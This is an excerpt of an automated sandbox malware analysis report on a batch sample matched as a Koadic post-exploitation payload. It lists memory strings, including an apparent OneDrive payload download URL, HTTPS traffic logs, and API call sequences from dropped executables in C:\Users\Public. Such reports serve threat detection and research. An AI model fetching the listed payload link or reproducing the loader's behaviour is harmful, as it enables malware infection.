0000001F.00000003.2250753517.0000000027276000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2460286645.0000000027226000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2177405424.00000000271F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048402158.0000000027240000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.0000000027203000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587623073.000000002727A000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 
0000001F.00000003.2250753517.0000000027282000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2493024630.000000002723E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msftauth.net/16.000.30359.3/images/favicon.ico
        Source: Ping_c.pif, 0000001F.00000003.2177670138.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1889176943.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2727134039.0000000027286000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2049253919.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357978518.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1826526825.00000000271F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048402158.000000002721E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1635151705.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2394138435.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1920846634.0000000027216000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587623073.0000000027286000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706868174.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1737658652.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1673627946.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288971180.0000000027226000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1859650606.00000000271F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706649495.00000000271F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2459802215.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1786740158.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 
0000001F.00000003.1633584244.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2321978307.000000002723A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msftauth.net/shared/5/js/login_en_wxGybS-mFhG0b0BcVHo8Cw2.js
        Source: Ping_c.pif, 0000001F.00000003.2394138435.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1953336418.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
        Source: Ping_c.pif, 0000001F.00000003.2216274021.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2321332613.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2662272349.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1744531159.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523153256.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2080476478.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2588420742.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/No
        Source: Ping_c.pif, 0000001F.00000003.2177670138.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1889176943.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2049253919.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357978518.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2394138435.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706868174.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1673627946.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2459802215.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523153256.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2216274021.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1793730015.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1922014929.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2427549071.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288367402.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2020461089.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627952934.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2703452505.0000000000778000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2080476478.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1953336418.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 
0000001F.00000003.2492438082.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1826725982.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?res=1EA3E8EA0AAD572E%21216&authkey=
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey=
        Source: Ping_c.pif, 0000001F.00000003.1826725982.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/fo
        Source: Ping_c.pif, 0000001F.00000003.2020461089.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/zfo
        Source: unknown - Network traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 53566 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53564
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53563
        Source: unknown - Network traffic detected: HTTP traffic on port 53572 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53569
        Source: unknown - Network traffic detected: HTTP traffic on port 53537 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53567
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53566
        Source: unknown - Network traffic detected: HTTP traffic on port 53552 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 53575 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53572
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53570
        Source: unknown - Network traffic detected: HTTP traffic on port 53546 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 53569 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 53523 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 53540 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 53563 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53576
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53575
        Source: unknown - Network traffic detected: HTTP traffic on port 53511 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 53557 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53573
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53579
        Source: unknown - Network traffic detected: HTTP traffic on port 53532 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 53519 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53578
        Source: unknown - Network traffic detected: HTTP traffic on port 53578 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53582
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53581
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknown - Network traffic detected: HTTP traffic on port 53581 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknown - Network traffic detected: HTTP traffic on port 53543 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknown - Network traffic detected: HTTP traffic on port 53526 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 53560 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknown - Network traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 53587 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53587
        Source: unknown - Network traffic detected: HTTP traffic on port 53570 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53585
        Source: unknown - Network traffic detected: HTTP traffic on port 53593 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53584
        Source: unknown - Network traffic detected: HTTP traffic on port 53531 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53588
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53590
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53594
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53593
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 53591
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknown - Network traffic detected: HTTP traffic on port 53584 -> 443
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknown - Network traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknown - Network traffic detected: HTTP traffic on port 53525 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53516
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53515
        Source: unknownNetwork traffic detected: HTTP traffic on port 53590 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53519
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53510
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53573 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53511
        Source: unknownNetwork traffic detected: HTTP traffic on port 53534 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53576 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53528 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 53520 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53529
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53528
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53526
        Source: unknownNetwork traffic detected: HTTP traffic on port 53591 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53585 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53520
        Source: unknownNetwork traffic detected: HTTP traffic on port 53510 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53525
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53523
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53522
        Source: unknownNetwork traffic detected: HTTP traffic on port 53579 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53582 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53515 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53588 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53538
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53537
        Source: unknownNetwork traffic detected: HTTP traffic on port 53567 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53532
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53531
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53535
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53534
        Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53553 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53522 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53547 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53564 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53549
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53543
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53541
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53540
        Source: unknownNetwork traffic detected: HTTP traffic on port 53558 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53547
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53546
        Source: unknownNetwork traffic detected: HTTP traffic on port 53535 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53516 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53544
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53550
        Source: unknownNetwork traffic detected: HTTP traffic on port 53529 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53561 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53544 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53538 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53553
        Source: unknownNetwork traffic detected: HTTP traffic on port 53594 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53552
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53558
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53557
        Source: unknownNetwork traffic detected: HTTP traffic on port 53549 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53561
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53560
        Source: unknownNetwork traffic detected: HTTP traffic on port 53541 -> 443
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49720 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49723 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49726 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49729 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53511 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53516 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53520 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53523 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53526 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53529 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53532 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53535 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53538 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53541 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53544 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53547 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53550 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53553 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53558 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53561 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53564 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53567 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53570 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53573 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53576 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53579 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53582 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53585 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53588 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53591 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53594 version: TLS 1.2

        E-Banking Fraud

        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF6080060BC CertCreateCertificateContext,GetLastError,#357,CertAddCertificateContextToStore,GetLastError,#357,CertCompareCertificateName,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,CertFreeCertificateContext,CertCloseStore

        Spam, unwanted Advertisements and Ransom Demands

        Source: C:\Users\Public\xkn.exe; Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Users\Public\xkn.exe; Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF607FB29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey
        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF607FDEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash
        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF608026EA8 NCryptImportKey,#360
        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF607FF0EF4 NCryptImportKey,#205,#359,#359,#357
        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF607FE0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext
        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF607FEE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject
        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF607FB25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey
        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF60802A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext
        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF607F7F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree
        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF607F8FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357
        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF6080293A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext
        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF607FF342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError
        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF607FE184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree
        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF6080298B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext

        System Summary

        Source: rPO767575.cmd, type: SAMPLE; Matched rule: Koadic post-exploitation framework BAT payload, Author: ditekSHen
        Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF744F03D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
        Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF744F31538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
        Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF744F1898C NtQueryInformationToken
        Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF744F189E4 NtQueryInformationToken,NtQueryInformationToken
        Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF744F188C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
        Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF744F2BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
        Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF744F18114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
        Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF744F17FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
        Source: C:\Users\Public\alpha.exe; Code function: 5_2_00007FF744F03D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
        Source: C:\Users\Public\alpha.exe; Code function: 5_2_00007FF744F31538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
        Source: C:\Users\Public\alpha.exe; Code function: 5_2_00007FF744F1898C NtQueryInformationToken
        Source: C:\Users\Public\alpha.exe; Code function: 5_2_00007FF744F189E4 NtQueryInformationToken,NtQueryInformationToken
        Source: C:\Users\Public\alpha.exe; Code function: 5_2_00007FF744F188C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
        Source: C:\Users\Public\alpha.exe; Code function: 5_2_00007FF744F2BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
        Source: C:\Users\Public\alpha.exe; Code function: 5_2_00007FF744F18114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
        Source: C:\Users\Public\alpha.exe; Code function: 5_2_00007FF744F17FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
        Source: C:\Users\Public\alpha.exe; Code function: 8_2_00007FF744F03D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
        Source: C:\Users\Public\alpha.exe; Code function: 8_2_00007FF744F31538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
        Source: C:\Users\Public\alpha.exe; Code function: 8_2_00007FF744F1898C NtQueryInformationToken
        Source: C:\Users\Public\alpha.exe; Code function: 8_2_00007FF744F189E4 NtQueryInformationToken,NtQueryInformationToken
        Source: C:\Users\Public\alpha.exe; Code function: 8_2_00007FF744F188C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
        Source: C:\Users\Public\alpha.exe; Code function: 8_2_00007FF744F2BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
        Source: C:\Users\Public\alpha.exe; Code function: 8_2_00007FF744F18114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
        Source: C:\Users\Public\alpha.exe; Code function: 8_2_00007FF744F17FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
        Source: C:\Users\Public\kn.exe; Code function: 9_2_00007FF60804C964 NtQuerySystemTime,RtlTimeToSecondsSince1970
        Source: C:\Users\Public\ger.exe; Code function: 19_2_00007FF73A399890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey
        Source: C:\Users\Public\Libraries\Ping_c.pif; Code function: 31_2_0295D6D4 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess
        Source: C:\Users\Public\Libraries\Ping_c.pif; Code function: 31_2_0295D654 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess
        Source: C:\Users\Public\Libraries\Ping_c.pif; Code function: 31_2_0295C7B8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
        Source: C:\Users\Public\Libraries\Ping_c.pif; Code function: 31_2_02957A74 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory
